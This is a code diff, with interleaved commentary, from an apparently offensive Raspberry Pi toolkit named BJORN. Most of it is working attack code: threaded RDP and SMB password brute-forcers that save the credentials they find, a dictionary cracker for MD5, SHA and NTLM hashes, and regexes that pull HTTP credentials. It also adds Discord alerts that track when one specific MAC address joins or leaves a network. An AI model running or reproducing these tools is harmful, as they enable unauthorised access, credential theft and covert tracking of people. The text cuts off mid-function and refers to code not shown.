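The `_analyze_http` logic above boils down to running each regex in `CREDENTIAL_PATTERNS['http']` against the request URI and keeping the first hit per field. A standalone sketch of that extraction (the helper name and sample URI are illustrative, not part of the module):

```python
import re

# Subset of the module's CREDENTIAL_PATTERNS, reproduced for a standalone demo.
HTTP_PATTERNS = {
    'username': [r'username=([^&]+)', r'user=([^&]+)', r'login=([^&]+)'],
    'password': [r'password=([^&]+)', r'pass=([^&]+)'],
}

def extract_http_creds(uri: str) -> dict:
    """Return {field: first_match} for every credential field found in the URI."""
    found = {}
    for field, patterns in HTTP_PATTERNS.items():
        for pattern in patterns:
            m = re.findall(pattern, uri, re.I)
            if m:
                found[field] = m[0]
                break  # first matching pattern wins, as in _analyze_http
    return found

creds = extract_http_creds("/login.php?user=alice&password=hunter2&submit=1")
print(creds)  # {'username': 'alice', 'password': 'hunter2'}
```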

84
actions/presence_join.py Normal file

@@ -0,0 +1,84 @@
# actions/presence_join.py
# -*- coding: utf-8 -*-
"""
PresenceJoin — Sends a Discord webhook when the targeted host JOINS the network.
- Triggered by the scheduler ONLY on transition OFF->ON (b_trigger="on_join").
- Targeting via b_requires (e.g. {"any":[{"mac_is":"AA:BB:..."}]}).
- The action does not query anything: it only notifies when called.
"""
import requests
from typing import Optional
import logging
import datetime
from logger import Logger
from shared import SharedData # only if executed directly for testing
logger = Logger(name="PresenceJoin", level=logging.DEBUG)
# --- Metadata (truth is in DB; here for reference/consistency) --------------
b_class = "PresenceJoin"
b_module = "presence_join"
b_status = "PresenceJoin"
b_port = None
b_service = None
b_parent = None
b_priority = 90
b_cooldown = 0 # not needed: on_join only fires on join transition
b_rate_limit = None
b_trigger = "on_join" # <-- Host JOINED the network (OFF -> ON since last scan)
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed
DISCORD_WEBHOOK_URL = "" # Configure via shared_data or DB
class PresenceJoin:
def __init__(self, shared_data):
self.shared_data = shared_data
def _send(self, text: str) -> None:
url = getattr(self.shared_data, 'discord_webhook_url', None) or DISCORD_WEBHOOK_URL
if not url or "webhooks/" not in url:
logger.error("PresenceJoin: DISCORD_WEBHOOK_URL missing/invalid.")
return
try:
r = requests.post(url, json={"content": text}, timeout=6)
if r.status_code < 300:
logger.info("PresenceJoin: webhook sent.")
else:
logger.error(f"PresenceJoin: HTTP {r.status_code}: {r.text}")
except Exception as e:
logger.error(f"PresenceJoin: webhook error: {e}")
def execute(self, ip: Optional[str], port: Optional[str], row: dict, status_key: str):
"""
Called by the orchestrator when the scheduler detected the join.
ip/port = host targets (if known), row = host info.
"""
try:
mac = row.get("MAC Address") or row.get("mac_address") or "MAC"
host = row.get("hostname") or (row.get("hostnames") or "").split(";")[0] or None
name = f"{host} ({mac})" if host else mac
ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
# Add timestamp in UTC
timestamp = datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
msg = f"✅ **Presence detected**\n"
msg += f"- Host: {host or 'unknown'}\n"
msg += f"- MAC: {mac}\n"
if ip_s:
msg += f"- IP: {ip_s}\n"
msg += f"- Time: {timestamp}"
self._send(msg)
return "success"
except Exception as e:
logger.error(f"PresenceJoin error: {e}")
return "failed"
if __name__ == "__main__":
sd = SharedData()
logger.info("PresenceJoin ready (direct mode).")
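The `b_requires` clause above is declarative; the scheduler that evaluates it is not part of this diff. A minimal sketch of how the `{"any": [{"mac_is": ...}]}` shape could be interpreted (the function name and exact matching semantics are assumptions, not the project's actual matcher):

```python
def matches_requires(requires: dict, row: dict) -> bool:
    """Minimal interpreter for the b_requires shape used above.

    Supports {"any": [{"mac_is": "<mac>"}, ...]}: the action is eligible if
    any clause matches the host row. MAC comparison is case-insensitive.
    """
    mac = (row.get("MAC Address") or row.get("mac_address") or "").lower()
    for clause in requires.get("any", []):
        want = clause.get("mac_is", "").lower()
        if want and want == mac:
            return True
    return False

rule = {"any": [{"mac_is": "60:57:C8:51:63:FB"}]}
print(matches_requires(rule, {"mac_address": "60:57:c8:51:63:fb"}))  # True
print(matches_requires(rule, {"mac_address": "aa:bb:cc:dd:ee:ff"}))  # False
```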

84
actions/presence_left.py Normal file

@@ -0,0 +1,84 @@
# actions/presence_left.py
# -*- coding: utf-8 -*-
"""
PresenceLeave — Sends a Discord webhook when the targeted host LEAVES the network.
- Triggered by the scheduler ONLY on transition ON->OFF (b_trigger="on_leave").
- Targeting via b_requires (e.g. {"any":[{"mac_is":"AA:BB:..."}]}).
- The action does not query anything: it only notifies when called.
"""
import requests
from typing import Optional
import logging
import datetime
from logger import Logger
from shared import SharedData # only if executed directly for testing
logger = Logger(name="PresenceLeave", level=logging.DEBUG)
# --- Metadata (truth is in DB; here for reference/consistency) --------------
b_class = "PresenceLeave"
b_module = "presence_left"
b_status = "PresenceLeave"
b_port = None
b_service = None
b_parent = None
b_priority = 90
b_cooldown = 0 # not needed: on_leave only fires on leave transition
b_rate_limit = None
b_trigger = "on_leave" # <-- Host LEFT the network (ON -> OFF since last scan)
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed
b_enabled = 1
DISCORD_WEBHOOK_URL = "" # Configure via shared_data or DB
class PresenceLeave:
def __init__(self, shared_data):
self.shared_data = shared_data
def _send(self, text: str) -> None:
url = getattr(self.shared_data, 'discord_webhook_url', None) or DISCORD_WEBHOOK_URL
if not url or "webhooks/" not in url:
logger.error("PresenceLeave: DISCORD_WEBHOOK_URL missing/invalid.")
return
try:
r = requests.post(url, json={"content": text}, timeout=6)
if r.status_code < 300:
logger.info("PresenceLeave: webhook sent.")
else:
logger.error(f"PresenceLeave: HTTP {r.status_code}: {r.text}")
except Exception as e:
logger.error(f"PresenceLeave: webhook error: {e}")
def execute(self, ip: Optional[str], port: Optional[str], row: dict, status_key: str):
"""
Called by the orchestrator when the scheduler detected the disconnection.
ip/port = last known target (if available), row = host info.
"""
try:
mac = row.get("MAC Address") or row.get("mac_address") or "MAC"
host = row.get("hostname") or (row.get("hostnames") or "").split(";")[0] or None
ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
# Add timestamp in UTC
timestamp = datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
msg = f"❌ **Presence lost**\n"
msg += f"- Host: {host or 'unknown'}\n"
msg += f"- MAC: {mac}\n"
if ip_s:
msg += f"- Last IP: {ip_s}\n"
msg += f"- Time: {timestamp}"
self._send(msg)
return "success"
except Exception as e:
logger.error(f"PresenceLeave error: {e}")
return "failed"
if __name__ == "__main__":
sd = SharedData()
logger.info("PresenceLeave ready (direct mode).")
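Both presence actions depend on the scheduler detecting an OFF->ON or ON->OFF transition between two scans. The diffing itself can be sketched as a set comparison of consecutive snapshots (a standalone illustration; the real scheduler is not shown in this diff):

```python
def presence_transitions(prev_online: set, now_online: set):
    """Diff two scan snapshots of online MACs into join/leave events,
    mirroring the on_join (OFF->ON) and on_leave (ON->OFF) triggers."""
    joined = sorted(now_online - prev_online)  # OFF -> ON since last scan
    left = sorted(prev_online - now_online)    # ON -> OFF since last scan
    return joined, left

prev = {"60:57:c8:51:63:fb", "aa:bb:cc:dd:ee:ff"}
now = {"aa:bb:cc:dd:ee:ff", "11:22:33:44:55:66"}
joined, left = presence_transitions(prev, now)
print(joined)  # ['11:22:33:44:55:66']
print(left)    # ['60:57:c8:51:63:fb']
```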


@@ -1,198 +0,0 @@
"""
rdp_connector.py - This script performs a brute force attack on RDP services (port 3389) to find accessible accounts using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import subprocess
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="rdp_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "RDPBruteforce"
b_module = "rdp_connector"
b_status = "brute_force_rdp"
b_port = 3389
b_parent = None
class RDPBruteforce:
"""
Class to handle the RDP brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.rdp_connector = RDPConnector(shared_data)
logger.info("RDPConnector initialized.")
def bruteforce_rdp(self, ip, port):
"""
Run the RDP brute force attack on the given IP and port.
"""
logger.info(f"Running bruteforce_rdp on {ip}:{port}...")
return self.rdp_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
logger.info(f"Executing RDPBruteforce on {ip}:{port}...")
self.shared_data.bjornorch_status = "RDPBruteforce"
success, results = self.bruteforce_rdp(ip, port)
return 'success' if success else 'failed'
class RDPConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3389", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.rdpfile = shared_data.rdpfile
# If the file doesn't exist, it will be created
if not os.path.exists(self.rdpfile):
logger.info(f"File {self.rdpfile} does not exist. Creating...")
with open(self.rdpfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for RDP ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3389", na=False)]
def rdp_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an RDP service using the given credentials.
"""
command = f"xfreerdp /v:{adresse_ip} /u:{user} /p:{password} /cert:ignore +auth-only"
try:
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
return True
else:
return False
except subprocess.SubprocessError as e:
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.rdp_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
# Resolve the host identity first: these values were previously read after
# the queue.put loop, causing a NameError on the first queued attempt.
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing RDP...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.rdpfile, index=False, mode='a', header=not os.path.exists(self.rdpfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.rdpfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.rdpfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
rdp_bruteforce = RDPBruteforce(shared_data)
logger.info("Starting RDP attack on port 3389...")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing RDPBruteforce on {ip}...")
rdp_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total successes: {len(rdp_bruteforce.rdp_connector.results)}")
exit(len(rdp_bruteforce.rdp_connector.results))
except Exception as e:
logger.error(f"Error: {e}")
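The deleted `rdp_connect` above built its `xfreerdp` command as an f-string and ran it with `shell=True`, which breaks (or worse, injects) on passwords containing spaces or shell metacharacters. A safer sketch builds the same auth-only probe as an argv list for `shell=False` execution (the helper name is hypothetical):

```python
import shlex

def build_xfreerdp_cmd(ip: str, user: str, password: str) -> list:
    """Build the xfreerdp auth-only probe as an argv list.

    Passing a list to subprocess (shell=False) avoids the quoting and
    injection pitfalls of the f-string + shell=True form used above.
    """
    return ["xfreerdp", f"/v:{ip}", f"/u:{user}", f"/p:{password}",
            "/cert:ignore", "+auth-only"]

cmd = build_xfreerdp_cmd("192.168.1.10", "admin", "p@ss w0rd")
print(cmd)
print(shlex.join(cmd))  # shell-quoted form, safe to paste into a shell
```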

209
actions/rune_cracker.py Normal file

@@ -0,0 +1,209 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
rune_cracker.py -- Advanced password cracker for BJORN.
Supports multiple hash formats and uses bruteforce_common for progress tracking.
Optimized for Pi Zero 2 (limited CPU/RAM).
"""
import os
import json
import hashlib
import re
import threading
import time
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor
from typing import Any, Dict, List, Optional, Set
from logger import Logger
from actions.bruteforce_common import ProgressTracker, merged_password_plan
logger = Logger(name="rune_cracker.py")
# -------------------- Action metadata --------------------
b_class = "RuneCracker"
b_module = "rune_cracker"
b_status = "rune_cracker"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "normal"
b_priority = 40
b_cooldown = 0
b_rate_limit = None
b_timeout = 600
b_max_retries = 1
b_stealth_level = 10 # Local cracking is stealthy
b_risk_level = "low"
b_enabled = 1
b_tags = ["crack", "hash", "bruteforce", "local"]
b_category = "exploitation"
b_name = "Rune Cracker"
b_description = "Advanced password cracker with mutation rules and progress tracking."
b_author = "Bjorn Team"
b_version = "2.1.0"
b_icon = "RuneCracker.png"
# Supported hash types and their patterns
HASH_PATTERNS = {
'md5': r'^[a-fA-F0-9]{32}$',
'sha1': r'^[a-fA-F0-9]{40}$',
'sha256': r'^[a-fA-F0-9]{64}$',
'sha512': r'^[a-fA-F0-9]{128}$',
'ntlm': r'^[a-fA-F0-9]{32}$'
}
class RuneCracker:
def __init__(self, shared_data):
self.shared_data = shared_data
self.hashes: Set[str] = set()
self.cracked: Dict[str, Dict[str, Any]] = {}
self.lock = threading.Lock()
self.hash_type: Optional[str] = None
# Performance tuning for Pi Zero 2
self.max_workers = int(getattr(shared_data, "rune_cracker_workers", 4))
def _hash_password(self, password: str, h_type: str) -> Optional[str]:
"""Generate hash for a password using specified algorithm."""
try:
if h_type == 'md5':
return hashlib.md5(password.encode()).hexdigest()
elif h_type == 'sha1':
return hashlib.sha1(password.encode()).hexdigest()
elif h_type == 'sha256':
return hashlib.sha256(password.encode()).hexdigest()
elif h_type == 'sha512':
return hashlib.sha512(password.encode()).hexdigest()
elif h_type == 'ntlm':
# NTLM is MD4(UTF-16LE(password))
return hashlib.new('md4', password.encode('utf-16le')).hexdigest()
except Exception as e:
logger.debug(f"Hashing error ({h_type}): {e}")
return None
def _crack_password_worker(self, password: str, progress: ProgressTracker):
"""Worker function for cracking passwords."""
if self.shared_data.orchestrator_should_exit:
return
for h_type in HASH_PATTERNS.keys():
if self.hash_type and self.hash_type != h_type:
continue
hv = self._hash_password(password, h_type)
if hv and hv in self.hashes:
with self.lock:
if hv not in self.cracked:
self.cracked[hv] = {
"password": password,
"type": h_type,
"cracked_at": datetime.now().isoformat()
}
logger.success(f"Cracked {h_type}: {hv[:8]}... -> {password}")
self.shared_data.log_milestone(b_class, "Cracked", f"{h_type} found!")
progress.advance()
def execute(self, ip, port, row, status_key) -> str:
"""Standard Orchestrator entry point."""
input_file = str(getattr(self.shared_data, "rune_cracker_input", ""))
wordlist_path = str(getattr(self.shared_data, "rune_cracker_wordlist", ""))
self.hash_type = getattr(self.shared_data, "rune_cracker_type", None)
output_dir = getattr(self.shared_data, "rune_cracker_output", "/home/bjorn/Bjorn/data/output/hashes")
if not input_file or not os.path.exists(input_file):
# Fallback: Check for latest odin_recon or other hashes if running in generic mode
potential_input = os.path.join(self.shared_data.data_dir, "output", "packets", "latest_hashes.txt")
if os.path.exists(potential_input):
input_file = potential_input
logger.info(f"RuneCracker: No input provided, using fallback: {input_file}")
else:
logger.error(f"Input file not found: {input_file}")
return "failed"
# Load hashes
self.hashes.clear()
try:
with open(input_file, 'r', encoding="utf-8", errors="ignore") as f:
for line in f:
hv = line.strip()
if not hv: continue
# Auto-detect or validate
for h_t, pat in HASH_PATTERNS.items():
if re.match(pat, hv):
if not self.hash_type or self.hash_type == h_t:
self.hashes.add(hv)
break
except Exception as e:
logger.error(f"Error loading hashes: {e}")
return "failed"
if not self.hashes:
logger.warning("No valid hashes found in input file.")
return "failed"
logger.info(f"RuneCracker: Loaded {len(self.hashes)} hashes. Starting engine...")
self.shared_data.log_milestone(b_class, "Initialization", f"Loaded {len(self.hashes)} hashes")
# Prepare password plan
dict_passwords = []
if wordlist_path and os.path.exists(wordlist_path):
with open(wordlist_path, 'r', encoding="utf-8", errors="ignore") as f:
dict_passwords = [l.strip() for l in f if l.strip()]
else:
# Fallback tiny list
dict_passwords = ['password', 'admin', '123456', 'qwerty', 'bjorn']
dictionary, fallback = merged_password_plan(self.shared_data, dict_passwords)
all_candidates = dictionary + fallback
progress = ProgressTracker(self.shared_data, len(all_candidates))
self.shared_data.log_milestone(b_class, "Bruteforce", f"Testing {len(all_candidates)} candidates")
try:
with ThreadPoolExecutor(max_workers=self.max_workers) as executor:
for pwd in all_candidates:
if self.shared_data.orchestrator_should_exit:
executor.shutdown(wait=False)
return "interrupted"
executor.submit(self._crack_password_worker, pwd, progress)
except Exception as e:
logger.error(f"Cracking engine error: {e}")
return "failed"
# Save results
if self.cracked:
os.makedirs(output_dir, exist_ok=True)
out_file = os.path.join(output_dir, f"cracked_{int(time.time())}.json")
with open(out_file, 'w', encoding="utf-8") as f:
json.dump({
"target_file": input_file,
"total_hashes": len(self.hashes),
"cracked_count": len(self.cracked),
"results": self.cracked
}, f, indent=4)
logger.success(f"Cracked {len(self.cracked)} hashes! Results: {out_file}")
self.shared_data.log_milestone(b_class, "Complete", f"Cracked {len(self.cracked)} hashes")
return "success"
logger.info("Cracking finished. No matches found.")
self.shared_data.log_milestone(b_class, "Finished", "No passwords found")
return "success" # Still success even if 0 cracked, as it finished the task
if __name__ == "__main__":
# Minimal CLI for testing
import sys
from init_shared import shared_data
if len(sys.argv) < 2:
print("Usage: rune_cracker.py <hash_file>")
sys.exit(1)
shared_data.rune_cracker_input = sys.argv[1]
cracker = RuneCracker(shared_data)
cracker.execute("local", None, {}, "rune_cracker")
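`RuneCracker` identifies hash types purely by hex-string length, which is why `md5` and `ntlm` are ambiguous (both 32 hex chars) and the operator can pin `rune_cracker_type`. A standalone sketch of the detection plus a verification against a well-known MD5 digest (`detect_types` is an illustrative helper, not part of the module):

```python
import hashlib
import re

# Length-based patterns, as in HASH_PATTERNS above
# (ntlm omitted here so md5 detection is unambiguous in the demo).
PATTERNS = {
    'md5': r'^[a-fA-F0-9]{32}$',
    'sha1': r'^[a-fA-F0-9]{40}$',
    'sha256': r'^[a-fA-F0-9]{64}$',
}

def detect_types(hv: str) -> list:
    """Return every hash type whose pattern matches the candidate string."""
    return [t for t, pat in PATTERNS.items() if re.match(pat, hv)]

digest = hashlib.md5("password".encode()).hexdigest()
print(detect_types(digest))  # ['md5']
print(digest == "5f4dcc3b5aa765d61d8327deb882cf99")  # True
```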

File diff suppressed because it is too large.

381
actions/smb_bruteforce.py Normal file

@@ -0,0 +1,381 @@
"""
smb_bruteforce.py — SMB bruteforce (DB-backed, no CSV/JSON, no rich)
- Targets are supplied by the orchestrator (ip, port)
- IP -> (MAC, hostname) resolved from DB.hosts
- Successes recorded in DB.creds (service='smb'), one row PER SHARE (database=<share>)
- Keeps the queue/thread logic and signatures. No more rich/progress bars.
"""
import os
import threading
import logging
import time
from subprocess import Popen, PIPE, TimeoutExpired
from smb.SMBConnection import SMBConnection
from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
logger = Logger(name="smb_bruteforce.py", level=logging.DEBUG)
b_class = "SMBBruteforce"
b_module = "smb_bruteforce"
b_status = "brute_force_smb"
b_port = 445
b_parent = None
b_service = '["smb"]'
b_trigger = 'on_any:["on_service:smb","on_new_port:445"]'
b_priority = 70
b_cooldown = 1800 # 30 minutes between two runs
b_rate_limit = '3/86400' # at most 3 runs per day
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$'}
class SMBBruteforce:
"""Orchestrator wrapper -> SMBConnector."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.smb_bruteforce = SMBConnector(shared_data)
logger.info("SMBConnector initialized.")
def bruteforce_smb(self, ip, port):
"""Run the SMB bruteforce for (ip, port)."""
return self.smb_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Orchestrator entry point (returns 'success' / 'failed')."""
self.shared_data.bjorn_orch_status = "SMBBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
success, results = self.bruteforce_smb(ip, port)
return 'success' if success else 'failed'
class SMBConnector:
"""Manages SMB attempts, DB persistence, and the IP -> (MAC, hostname) mapping."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists unchanged
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Cache IP -> (mac, hostname)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [mac, ip, hostname, share, user, password, port]
self.queue = Queue()
self.progress = None
# ---------- file utils ----------
@staticmethod
def _read_lines(path: str) -> List[str]:
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---------- mapping DB hosts ----------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- SMB ----------
def smb_connect(self, adresse_ip: str, user: str, password: str) -> List[str]:
conn = SMBConnection(user, password, "Bjorn", "Target", use_ntlm_v2=True)
timeout = int(getattr(self.shared_data, "smb_connect_timeout_s", 6))
try:
conn.connect(adresse_ip, 445, timeout=timeout)
shares = conn.listShares()
accessible = []
for share in shares:
if share.isSpecial or share.isTemporary or share.name in IGNORED_SHARES:
continue
try:
conn.listPath(share.name, '/')
accessible.append(share.name)
logger.info(f"Access to share {share.name} successful on {adresse_ip} with user '{user}'")
except Exception as e:
logger.debug(f"Error accessing share {share.name} on {adresse_ip} with user '{user}': {e}")
try:
conn.close()
except Exception:
pass
return accessible
except Exception:
return []
def smbclient_l(self, adresse_ip: str, user: str, password: str) -> List[str]:
timeout = int(getattr(self.shared_data, "smb_connect_timeout_s", 6))
cmd = f'smbclient -L {adresse_ip} -U {user}%{password}'
process = None
try:
process = Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE)
try:
stdout, stderr = process.communicate(timeout=timeout)
except TimeoutExpired:
try:
process.kill()
except Exception:
pass
try:
stdout, stderr = process.communicate(timeout=2)
except Exception:
stdout, stderr = b"", b""
if b"Sharename" in stdout:
logger.info(f"Successful auth for {adresse_ip} with '{user}' using smbclient -L")
return self.parse_shares(stdout.decode(errors="ignore"))
else:
logger.info(f"Trying smbclient -L for {adresse_ip} with user '{user}'")
return []
except Exception as e:
logger.error(f"Error executing '{cmd}': {e}")
return []
finally:
if process:
try:
if process.poll() is None:
process.kill()
except Exception:
pass
try:
if process.stdout:
process.stdout.close()
except Exception:
pass
try:
if process.stderr:
process.stderr.close()
except Exception:
pass
@staticmethod
def parse_shares(smbclient_output: str) -> List[str]:
shares = []
for line in smbclient_output.splitlines():
if line.strip() and not line.startswith("Sharename") and not line.startswith("---------"):
parts = line.split()
if parts:
name = parts[0]
if name not in IGNORED_SHARES:
shares.append(name)
return shares
# ---------- DB upsert fallback ----------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('smb',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='smb'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE(COALESCE("database",""),'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
# ---------- worker / queue ----------
def worker(self, success_flag):
"""Worker thread for SMB bruteforce attempts."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
shares = self.smb_connect(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share in IGNORED_SHARES:
continue
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Share:{share}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port), "share": shares[0] if shares else ""}
self.save_results()
self.removeduplicates()
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Optional delay between attempts
if getattr(self.shared_data, "timewait_smb", 0) > 0:
time.sleep(self.shared_data.timewait_smb)
def run_bruteforce(self, adresse_ip: str, port: int):
self.results = []
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
# dictionary phase + exhaustive fallback phase + smbclient -L retry over dictionary passwords
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords) + len(dict_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
def run_primary_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
self.queue.join()
for t in threads:
t.join()
try:
run_primary_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"SMB dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_primary_phase(fallback_passwords)
# Keep smbclient -L fallback on dictionary passwords only (cost control).
if not success_flag[0] and not self.shared_data.orchestrator_should_exit:
logger.info(f"No success via SMBConnection. Trying smbclient -L for {adresse_ip}")
for user in self.users:
for password in dict_passwords:
shares = self.smbclient_l(adresse_ip, user, password)
if self.progress is not None:
self.progress.advance(1)
if shares:
with self.lock:
for share in shares:
if share in IGNORED_SHARES:
continue
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(
f"(SMB) Found credentials IP:{adresse_ip} | User:{user} | Share:{share} via smbclient -L"
)
self.save_results()
self.removeduplicates()
success_flag[0] = True
if getattr(self.shared_data, "timewait_smb", 0) > 0:
time.sleep(self.shared_data.timewait_smb)
self.progress.set_complete()
return success_flag[0], self.results
finally:
